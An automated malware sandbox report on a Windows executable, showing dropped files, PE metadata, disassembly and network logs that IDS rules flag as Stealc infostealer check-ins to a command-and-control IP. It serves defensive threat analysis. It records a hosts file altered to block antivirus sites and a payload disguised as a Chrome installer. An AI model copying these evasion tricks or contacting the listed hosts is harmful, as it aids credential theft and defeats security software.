Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 0T32Kz4dZU.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: tdnPqG0jmS.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......s,.>7M.m7M.m7M.m\|5.l<M.m\|5.l.M.m\|5.l#M.m'..l"M.m'..l'M.m'..l.M.m\|5.l:M.m7M.m.M.m7M.mlM.m...l6M.m...l6M.mRich7M.m........................PE..L......g.........."!...)............P.....................................................@..........................\..l...<].................................. 8...(..T....................(......@'..@............................................text............................... ..`.rdata..zV.......X..................@..@.data...T....p.......N..............@....reloc.. 8.......:...X..............@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\chrome_131[1].exe

Download File

Process:	C:\Users\user\Desktop\b4s45TboUL.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	8662936
Entropy (8bit):	7.927707184368659
Encrypted:	false
SSDEEP:	196608:weeq5JeITAZfUnRGPG+FyWlaYVNcT5qagonrxz/4fBiCY1MFU:u4J48svIiuT5PvQfBi3eFU
MD5:	0F247FC98A73243773ED3614FFAD3118
SHA1:	1BB4ECA56217F784738CB9108F18BF4C6B67F67E
SHA-256:	0CF1E07D9FF27240D711390121E4EA7EB6F84E3C150AE9BB6D860E2819AD61E5
SHA-512:	50414ED73F76AA6280AFF26D1AA7BFD99F49E6D6C8CD9470692674C1414DD9248CBD602028FC62335BC050179807B8290A27924DBD7D87BE620153BB9B56081A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 47%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....!g.........."...........l.....X..........@....................................zz....`.................................................B0n.d....Pn.H...................................................(@n.(................................................... &........o.................. ..` .*... ..<....t..............@..@ .l..P....Q.................@... ......m.......R.............@..@ ......m.......R.............@..@ ......n.......R.............@... P.....n.n.....R.............@..@ x.... n.i.....R.............@..B.imports.....0n.......R.............@....tls.........@n.......R..................rsrc........Pn...... R.............@..@.themida..W..`n......$R.............`....boot.....1.......1..$R.............`..`.reloc................................@........................................................

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	1.1510207563435464
Encrypted:	false
SSDEEP:	3:Nlllullkv/tz:NllU+v/
MD5:	6442F277E58B3984BA5EEE0C15C0C6AD
SHA1:	5343ADC2E7F102EC8FB6A101508730898CB14F57
SHA-256:	36B765624FCA82C57E4C5D3706FBD81B5419F18FC3DD7B77CD185E6E3483382D
SHA-512:	F9E62F510D5FB788F40EBA13287C282444607D2E0033D2233BC6C39CA3E1F5903B65A07F85FA0942BEDDCE2458861073772ACA06F291FA68F23C765B0CA5CA17
Malicious:	false
Preview:	@...e................................................@..........

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_btz1cm3s.gov.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hicgsr5n.sig.ps1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mni3cizy.z3i.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xcsmj2lc.25h.psm1

Download File

Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Windows\System32\drivers\etc\hosts

Download File

Process:	C:\ProgramData\HIIDGCGCBF.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2748
Entropy (8bit):	4.269302338623222
Encrypted:	false
SSDEEP:	48:vDZhyoZWM9rU5fFcDL6iCW1RiJ9rn5w0K:vDZEurK9XiCW1RiXn54
MD5:	7B1D6A1E1228728A16B66C3714AA9A23
SHA1:	8B59677A3560777593B1FA7D67465BBD7B3BC548
SHA-256:	3F15965D0159A818849134B3FBB016E858AC50EFDF67BFCD762606AC51831BC5
SHA-512:	573B68C9865416EA2F9CF5C614FCEDBFE69C67BD572BACEC81C1756E711BD90FCFEE93E17B74FB294756ADF67AD18845A56C87F7F870940CBAEB3A579146A3B6
Malicious:	true
Preview:	# Copyright (c) 1993-2009 Microsoft Corp...#..# This is a sample HOSTS file used by Microsoft TCP/IP for Windows...#..# This file contains the mappings of IP addresses to host names. Each..# entry should be kept on an individual line. The IP address should..# be placed in the first column followed by the corresponding host name...# The IP address and the host name should be separated by at least one..# space...#..# Additionally, comments (such as these) may be inserted on individual..# lines or following the machine name denoted by a '#' symbol...#..# For example:..#..# 102.54.94.97 rhino.acme.com # source server..# 38.25.63.10 x.acme.com # x client host....# localhost name resolution is handled within DNS itself...#.127.0.0.1 localhost..#.::1 localhost....0.0.0.0 avast.com..0.0.0.0 www.avast.com..0.0.0.0 totalav.com..0.0.0.0 www.totalav.com..0.0.0.0 scanguard.com..0.0.0.0 www.scanguard.com..

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.465440250634685
Encrypted:	false
SSDEEP:	6144:IIXfpi67eLPU9skLmb0b4+WSPKaJG8nAgejZMMhA2gX4WABl0uN/dwBCswSbU:dXD94+WlLZMM6YFH1+U
MD5:	9DC531EB64DE55E849B7F56FA3D87AAB
SHA1:	47B4B3A19C5CAB127CC7A5C0182EACB446EDA283
SHA-256:	0CC7A482DB11B444D823B88929D04FCC8C05945445624E77A69CCA87C47CDD02
SHA-512:	EC8CBA4E1AC4FD2F68C42744FCFFBA05288E989ACFF67DE90053E3A0EFBEE398044D33F084C4049B04E7DBCF2B1CDEF59CF8DE53B399C84867E5F644AAD5E220
Malicious:	false
Preview:	regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...'.*...............................................................................................................................................................................................................................................................................................................................................k..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.269274960247297
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	b4s45TboUL.exe
File size:	712'192 bytes
MD5:	b6f6e51f0efa952f3ffcaab9dd5895db
SHA1:	dadb11d90adb38dc798acae755004ed8e93b088f
SHA256:	7bfc486e94aacc90fac1037845f79f92f04a0db6fbbab9eaa45c4afe7d0a21fe
SHA512:	42f87f1ed44075552d20d96cfec11ff7627d6bd06ef9a3328853cc1fa8375290abc10c692d8059f1516b202b3b8cdadaf84933587e838a229c1d9e0b7fa3ed61
SSDEEP:	12288:r9p/R7g6IMdSZCNSSumwQypEun3a8N7yCqrT8O8EntuY9w+f4sij/I+7Nj:r9bqcJNHuNQypEun3aVCqrI6P9w+4jZj
TLSH:	DEE412007591E871C95256709828C6F41B3FBCB29E6479AF3B697FBF3970381A6B2311
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<.8.]yk.]yk.]yk...k.]yk...k.]yk...k.]yk...k.]yk.]xk.]yk...k.]yk...k.]yk...k.]ykRich.]yk................PE..L....Hoe...........

File Icon


Icon Hash:	63796de961436e0f

Static PE Info

General

Entrypoint:	0x405d0b
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	NX_COMPAT, TERMINAL_SERVER_AWARE
Time Stamp:	0x656F48D4 [Tue Dec 5 15:59:16 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	9972752d76c4469a480fbf42fd02d1a2

Entrypoint Preview

Instruction
call 00007FC60C4D204Fh
jmp 00007FC60C4CDFDEh
mov edi, edi
push ebp
mov ebp, esp
push edi
mov edi, 000003E8h
push edi
call dword ptr [004010D0h]
push dword ptr [ebp+08h]
call dword ptr [004010CCh]
add edi, 000003E8h
cmp edi, 0000EA60h
jnbe 00007FC60C4CE166h
test eax, eax
je 00007FC60C4CE140h
pop edi
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
call 00007FC60C4CE89Dh
push dword ptr [ebp+08h]
call 00007FC60C4CE6EAh
push dword ptr [0049302Ch]
call 00007FC60C4D1ADBh
push 000000FFh
call eax
add esp, 0Ch
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
push 00401210h
call dword ptr [004010CCh]
test eax, eax
je 00007FC60C4CE177h
push 00401200h
push eax
call dword ptr [0040107Ch]
test eax, eax
je 00007FC60C4CE167h
push dword ptr [ebp+08h]
call eax
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
push dword ptr [ebp+08h]
call 00007FC60C4CE12Dh
pop ecx
push dword ptr [ebp+08h]
call dword ptr [004010D4h]
int3
push 00000008h
call 00007FC60C4D0011h
pop ecx
ret
push 00000008h
call 00007FC60C4CFF2Eh
pop ecx
ret
mov edi, edi
push ebp
mov ebp, esp
push esi
mov esi, eax
jmp 00007FC60C4CE16Dh
mov eax, dword ptr [esi]
test eax, eax
je 00007FC60C4CE164h

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x91d74	0x64	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x9e000	0x149a8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x2eb000	0x9c8	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x47d8	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x188	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x9167a	0x91800	a07a53c78d7c602f413c9f13389d646b	False	0.8691070661512027	DIY-Thermocam raw data (Lepton 2.x), scale -30395--27360, spot sensor temperature 0.160650, unit celsius, color scheme 0, calibration: offset 0.000000, slope 0.167969	7.619569999320736	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x93000	0x9800	0x5c00	2d02ef982afb7cc6abac76ef99525603	False	0.07842221467391304	data	0.9100911859533071	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tehu	0x9d000	0x400	0x400	0f343b0931126a20f133d67c2b018a3b	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x9e000	0x24c9a8	0x14a00	4aa9e78bf29053432f1e679ebb6c88f0	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x2eb000	0x161e	0x1800	c28550a2a27c41aa7efd2ac700f64c98	False	0.3567708333333333	data	3.5521617801275434	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RELUZUZIJEREB	0xa9f38	0x1e31	ASCII text, with very long lines (7729), with no line terminators	Tamil	India	0.5880450252296545
RELUZUZIJEREB	0xa9f38	0x1e31	ASCII text, with very long lines (7729), with no line terminators	Tamil	Sri Lanka	0.5880450252296545
RIXIZUTOK	0xa81e0	0x9e7	ASCII text, with very long lines (2535), with no line terminators	Tamil	India	0.6047337278106509
RIXIZUTOK	0xa81e0	0x9e7	ASCII text, with very long lines (2535), with no line terminators	Tamil	Sri Lanka	0.6047337278106509
WIPOPABIZOVOZAVOBIMOZOZ	0xa8bc8	0x136f	ASCII text, with very long lines (4975), with no line terminators	Tamil	India	0.5911557788944724
WIPOPABIZOVOZAVOBIMOZOZ	0xa8bc8	0x136f	ASCII text, with very long lines (4975), with no line terminators	Tamil	Sri Lanka	0.5911557788944724
RT_CURSOR	0xabdc8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.2953091684434968
RT_CURSOR	0xacc70	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.46705776173285196
RT_CURSOR	0xad518	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5361271676300579
RT_CURSOR	0xadab0	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.4375
RT_CURSOR	0xadbe0	0xb0	Device independent bitmap graphic, 16 x 32 x 1, image size 0			0.44886363636363635
RT_CURSOR	0xadcb8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.27238805970149255
RT_CURSOR	0xaeb60	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.375
RT_CURSOR	0xaf408	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5057803468208093
RT_CURSOR	0xaf9a0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.30943496801705755
RT_CURSOR	0xb0848	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.427797833935018
RT_CURSOR	0xb10f0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5469653179190751
RT_ICON	0x9e8a0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	India	0.5357142857142857
RT_ICON	0x9e8a0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	Sri Lanka	0.5357142857142857
RT_ICON	0x9ef68	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	India	0.41161825726141077
RT_ICON	0x9ef68	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	Sri Lanka	0.41161825726141077
RT_ICON	0xa1510	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	India	0.44592198581560283
RT_ICON	0xa1510	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	Sri Lanka	0.44592198581560283
RT_ICON	0xa19a8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Tamil	India	0.36220682302771856
RT_ICON	0xa19a8	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors	Tamil	Sri Lanka	0.36220682302771856
RT_ICON	0xa2850	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Tamil	India	0.49864620938628157
RT_ICON	0xa2850	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	Tamil	Sri Lanka	0.49864620938628157
RT_ICON	0xa30f8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	India	0.5673963133640553
RT_ICON	0xa30f8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors	Tamil	Sri Lanka	0.5673963133640553
RT_ICON	0xa37c0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Tamil	India	0.6242774566473989
RT_ICON	0xa37c0	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	Tamil	Sri Lanka	0.6242774566473989
RT_ICON	0xa3d28	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Tamil	India	0.43132780082987554
RT_ICON	0xa3d28	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9600	Tamil	Sri Lanka	0.43132780082987554
RT_ICON	0xa62d0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Tamil	India	0.44183864915572235
RT_ICON	0xa62d0	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 4224	Tamil	Sri Lanka	0.44183864915572235
RT_ICON	0xa7378	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Tamil	India	0.4323770491803279
RT_ICON	0xa7378	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400	Tamil	Sri Lanka	0.4323770491803279
RT_ICON	0xa7d00	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Tamil	India	0.48404255319148937
RT_ICON	0xa7d00	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088	Tamil	Sri Lanka	0.48404255319148937
RT_DIALOG	0xb18d8	0x58	data			0.8977272727272727
RT_STRING	0xb1930	0x3fa	data	Tamil	India	0.4489194499017682
RT_STRING	0xb1930	0x3fa	data	Tamil	Sri Lanka	0.4489194499017682
RT_STRING	0xb1d30	0x318	data	Tamil	India	0.48863636363636365
RT_STRING	0xb1d30	0x318	data	Tamil	Sri Lanka	0.48863636363636365
RT_STRING	0xb2048	0x5c2	data	Tamil	India	0.4314789687924016
RT_STRING	0xb2048	0x5c2	data	Tamil	Sri Lanka	0.4314789687924016
RT_STRING	0xb2610	0x396	data	Tamil	India	0.45098039215686275
RT_STRING	0xb2610	0x396	data	Tamil	Sri Lanka	0.45098039215686275
RT_ACCELERATOR	0xabd70	0x58	data	Tamil	India	0.7954545454545454
RT_ACCELERATOR	0xabd70	0x58	data	Tamil	Sri Lanka	0.7954545454545454
RT_GROUP_CURSOR	0xada80	0x30	data			0.9375
RT_GROUP_CURSOR	0xadc90	0x22	data			1.0588235294117647
RT_GROUP_CURSOR	0xaf970	0x30	data			0.9375
RT_GROUP_CURSOR	0xb1658	0x30	data			0.9375
RT_GROUP_ICON	0xa1978	0x30	data	Tamil	India	0.9375
RT_GROUP_ICON	0xa1978	0x30	data	Tamil	Sri Lanka	0.9375
RT_GROUP_ICON	0xa8168	0x76	data	Tamil	India	0.6694915254237288
RT_GROUP_ICON	0xa8168	0x76	data	Tamil	Sri Lanka	0.6694915254237288
RT_VERSION	0xb1688	0x250	data			0.535472972972973

Imports

DLL	Import
KERNEL32.dll	CallNamedPipeA, CreateProcessW, InterlockedIncrement, InterlockedDecrement, GetCurrentProcess, CreateJobObjectW, WriteConsoleInputA, GetComputerNameW, GetTimeFormatA, FreeEnvironmentStringsA, GetTickCount, GetCommConfig, GetNumberFormatA, ClearCommBreak, EnumTimeFormatsA, TlsSetValue, GetCurrencyFormatW, SetFileShortNameW, LoadLibraryW, IsBadCodePtr, GetFileAttributesW, GetConsoleAliasExesA, GetShortPathNameA, LCMapStringA, InterlockedExchange, GlobalUnfix, GetLogicalDriveStringsA, GetLastError, SetLastError, GetProcAddress, VirtualAlloc, DefineDosDeviceW, GetDiskFreeSpaceW, LoadLibraryA, OpenJobObjectW, SetEnvironmentVariableA, GlobalUnWire, GetCurrentDirectoryA, OpenEventW, GetVersionExA, ReadConsoleInputW, SetFileAttributesW, GetModuleFileNameW, GetTempFileNameW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, HeapReAlloc, HeapAlloc, GetStartupInfoW, GetModuleHandleW, Sleep, ExitProcess, WriteFile, GetStdHandle, GetModuleFileNameA, RaiseException, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, HeapCreate, VirtualFree, HeapFree, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineW, SetHandleCount, GetFileType, GetStartupInfoA, TlsGetValue, TlsAlloc, TlsFree, GetCurrentThreadId, QueryPerformanceCounter, GetCurrentProcessId, GetSystemTimeAsFileTime, TerminateProcess, IsDebuggerPresent, InitializeCriticalSectionAndSpinCount, GetModuleHandleA, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, RtlUnwind, HeapSize, GetLocaleInfoA, WideCharToMultiByte, MultiByteToWideChar, LCMapStringW, GetStringTypeA, GetStringTypeW
GDI32.dll	GetCharWidth32A
ole32.dll	CoUnmarshalHresult
MSIMG32.dll	AlphaBlend

Possible Origin

Language of compilation system	Country where language is spoken	Map
Tamil	India
Tamil	Sri Lanka

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-10-30T19:47:00.667787+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.4	49730	45.91.200.39	80	TCP
2024-10-30T19:47:00.915029+0100	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.4	49730	45.91.200.39	80	TCP
2024-10-30T19:47:00.945251+0100	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	45.91.200.39	80	192.168.2.4	49730	TCP
2024-10-30T19:47:01.177086+0100	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.4	49730	45.91.200.39	80	TCP
2024-10-30T19:47:01.184458+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	45.91.200.39	80	192.168.2.4	49730	TCP
2024-10-30T19:47:02.064214+0100	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.4	49730	45.91.200.39	80	TCP
2024-10-30T19:47:02.569101+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49730	45.91.200.39	80	TCP
2024-10-30T19:47:08.220875+0100	2044249	ET MALWARE Win32/Stealc Submitting Screenshot to C2	1	192.168.2.4	49730	45.91.200.39	80	TCP
2024-10-30T19:47:10.996740+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.4	49731	87.106.236.48	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Oct 30, 2024 19:46:59.504781008 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:46:59.510255098 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:46:59.510344028 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:46:59.510721922 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:46:59.516069889 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:00.326957941 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:00.327037096 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:00.330980062 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:00.336380005 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:00.667704105 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:00.667787075 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:00.678425074 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:00.683764935 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:00.914757967 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:00.914849997 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:00.915029049 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:00.915029049 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:00.939768076 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:00.945250988 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:01.176774025 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:01.176826000 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:01.176884890 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:01.176920891 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:01.176955938 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:01.176991940 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:01.177028894 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:01.177086115 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:01.177196026 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:01.177196026 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:01.179101944 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:01.184458017 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:01.432435036 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:01.432552099 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:01.452884912 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:01.452927113 CET	49730	80	192.168.2.4	45.91.200.39
Oct 30, 2024 19:47:01.458295107 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:01.458336115 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:01.458344936 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:01.458399057 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:01.458705902 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:01.459101915 CET	80	49730	45.91.200.39	192.168.2.4
Oct 30, 2024 19:47:02.064091921 CET	80	49730	45.91.200.39	192.168.2.4
